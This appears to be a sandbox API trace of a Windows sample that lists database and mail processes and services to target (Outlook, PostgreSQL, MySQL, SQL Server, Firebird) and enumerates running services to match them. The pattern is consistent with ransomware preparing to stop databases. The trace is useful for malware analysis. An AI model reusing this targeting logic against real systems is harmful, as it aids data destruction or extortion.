RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b628, Size=0x10) returned 0x6fa130 [0153.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x6b6290 [0153.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1a) returned 0x6ddbb0 [0153.471] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6fa130, Size=0x20) returned 0x6dda70 [0153.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x6ddd68 [0153.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x16) returned 0x6b6210 [0153.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1a) returned 0x6dda48 [0153.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6f9fe0 [0153.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x73b708 [0153.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b78f8 [0153.472] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b708, Size=0x8) returned 0x73b668 [0153.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3c) returned 0x6b74c0 [0153.472] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b668, Size=0x10) returned 0x6fa130 [0153.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x6b6150 [0153.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x6b6410 [0153.472] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6fa130, Size=0x20) returned 0x6ddc50 [0153.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b5550 [0153.472] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0153.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x729608 | out: hHeap=0x6a0000) returned 1 [0153.472] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0153.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x729d40 | out: hHeap=0x6a0000) returned 1 [0153.472] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6ddb38 [0153.473] EnumServicesStatusExW (in: hSCManager=0x6ddb38, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0153.474] GetLastError () returned 0xea [0153.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1b4e) returned 0x6fb7b0 [0153.474] EnumServicesStatusExW (in: hSCManager=0x6ddb38, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6fb7b0, cbBufSize=0x1b4e, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6fb7b0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0153.476] CloseServiceHandle (hSCObject=0x6ddb38) returned 1 [0153.476] lstrlenW (lpString="AppXSvc") returned 7 [0153.476] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0153.476] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0153.476] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0153.476] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0153.477] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0153.477] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0153.477] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0153.477] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0153.477] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0153.477] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0153.477] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0153.477] lstrlenW (lpString="Audiosrv") returned 8 [0153.477] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0153.477] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0153.477] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0153.477] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0153.477] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0153.477] lstrlenW (lpString="BFE") returned 3 [0153.477] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0153.477] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0153.477] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0153.477] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0153.477] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0153.477] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0153.477] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0153.477] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0153.477] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0153.477] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0153.477] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0153.477] lstrlenW (lpString="CDPSvc") returned 6 [0153.477] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0153.478] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0153.478] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0153.478] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0153.478] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0153.478] lstrlenW (lpString="ClickToRunSvc") returned 13 [0153.478] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0153.478] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0153.478] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0153.478] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0153.478] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0153.478] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0153.478] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0153.478] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0153.478] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0153.478] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0153.478] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0153.478] lstrlenW (lpString="CryptSvc") returned 8 [0153.478] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0153.478] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0153.478] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0153.478] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0153.478] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0153.478] lstrlenW (lpString="DcomLaunch") returned 10 [0153.478] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0153.478] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0153.478] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0153.478] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0153.478] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0153.478] lstrlenW (lpString="DeviceAssociationService") returned 24 [0153.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0153.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0153.479] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0153.479] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0153.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0153.479] lstrlenW (lpString="Dhcp") returned 4 [0153.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0153.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0153.479] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0153.479] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0153.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0153.479] lstrlenW (lpString="Dnscache") returned 8 [0153.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0153.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0153.479] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0153.479] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0153.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0153.479] lstrlenW (lpString="DPS") returned 3 [0153.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0153.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0153.479] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0153.479] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0153.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0153.479] lstrlenW (lpString="DusmSvc") returned 7 [0153.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0153.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0153.479] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0153.479] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0153.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0153.479] lstrlenW (lpString="EventLog") returned 8 [0153.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0153.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0153.480] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0153.480] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0153.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0153.480] lstrlenW (lpString="EventSystem") returned 11 [0153.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0153.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0153.480] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0153.480] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0153.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0153.480] lstrlenW (lpString="FontCache") returned 9 [0153.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0153.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0153.480] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0153.480] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0153.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0153.480] lstrlenW (lpString="gpsvc") returned 5 [0153.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0153.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0153.480] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0153.480] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0153.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0153.480] lstrlenW (lpString="iphlpsvc") returned 8 [0153.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0153.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0153.480] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0153.480] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0153.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0153.480] lstrlenW (lpString="KeyIso") returned 6 [0153.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0153.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0153.481] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0153.481] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0153.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0153.481] lstrlenW (lpString="LanmanServer") returned 12 [0153.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0153.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0153.481] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0153.481] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0153.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0153.481] lstrlenW (lpString="LanmanWorkstation") returned 17 [0153.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0153.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0153.481] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0153.481] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0153.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0153.481] lstrlenW (lpString="lfsvc") returned 5 [0153.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0153.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0153.481] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0153.482] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0153.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0153.482] lstrlenW (lpString="lmhosts") returned 7 [0153.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0153.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0153.482] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0153.482] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0153.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0153.482] lstrlenW (lpString="LSM") returned 3 [0153.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0153.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0153.482] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0153.482] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0153.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0153.482] lstrlenW (lpString="MpsSvc") returned 6 [0153.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0153.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0153.483] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0153.483] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0153.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0153.483] lstrlenW (lpString="NcbService") returned 10 [0153.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0153.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0153.483] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0153.483] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0153.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0153.483] lstrlenW (lpString="netprofm") returned 8 [0153.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0153.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0153.483] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0153.483] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0153.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0153.483] lstrlenW (lpString="NgcSvc") returned 6 [0153.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0153.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0153.484] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0153.484] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0153.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0153.484] lstrlenW (lpString="NlaSvc") returned 6 [0153.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0153.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0153.484] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0153.484] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0153.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0153.484] lstrlenW (lpString="nsi") returned 3 [0153.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0153.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0153.484] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0153.484] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0153.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0153.484] lstrlenW (lpString="PcaSvc") returned 6 [0153.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0153.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0153.485] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0153.485] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0153.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0153.485] lstrlenW (lpString="PlugPlay") returned 8 [0153.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0153.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0153.485] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0153.485] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0153.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0153.485] lstrlenW (lpString="Power") returned 5 [0153.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0153.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0153.485] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0153.485] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0153.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0153.485] lstrlenW (lpString="ProfSvc") returned 7 [0153.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0153.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0153.486] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0153.486] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0153.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0153.486] lstrlenW (lpString="RpcEptMapper") returned 12 [0153.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0153.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0153.486] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0153.486] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0153.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0153.486] lstrlenW (lpString="RpcSs") returned 5 [0153.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0153.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0153.486] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0153.486] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0153.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0153.486] lstrlenW (lpString="SamSs") returned 5 [0153.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0153.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0153.487] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0153.487] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0153.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0153.487] lstrlenW (lpString="Schedule") returned 8 [0153.817] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0153.817] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0153.817] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0153.817] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0153.817] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0153.817] lstrlenW (lpString="SecurityHealthService") returned 21 [0153.817] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0153.817] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0153.817] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0153.817] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0153.817] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0153.817] lstrlenW (lpString="SENS") returned 4 [0153.817] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0153.817] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0153.817] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0153.817] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0153.817] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0153.817] lstrlenW (lpString="ShellHWDetection") returned 16 [0153.817] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0153.817] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0153.817] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0153.817] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0153.817] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0153.817] lstrlenW (lpString="Spooler") returned 7 [0153.817] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0153.817] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0153.817] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0153.817] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0153.818] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0153.818] lstrlenW (lpString="StateRepository") returned 15 [0153.818] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0153.818] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0153.818] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0153.818] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0153.818] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0153.818] lstrlenW (lpString="SysMain") returned 7 [0153.818] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0153.818] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0153.818] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0153.818] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0153.818] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0153.818] lstrlenW (lpString="SystemEventsBroker") returned 18 [0153.818] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0153.818] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0153.818] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0153.818] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0153.818] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0153.818] lstrlenW (lpString="Themes") returned 6 [0153.818] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0153.818] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0153.818] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0153.818] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0153.818] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0153.818] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0153.818] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0153.818] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0153.818] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0153.818] 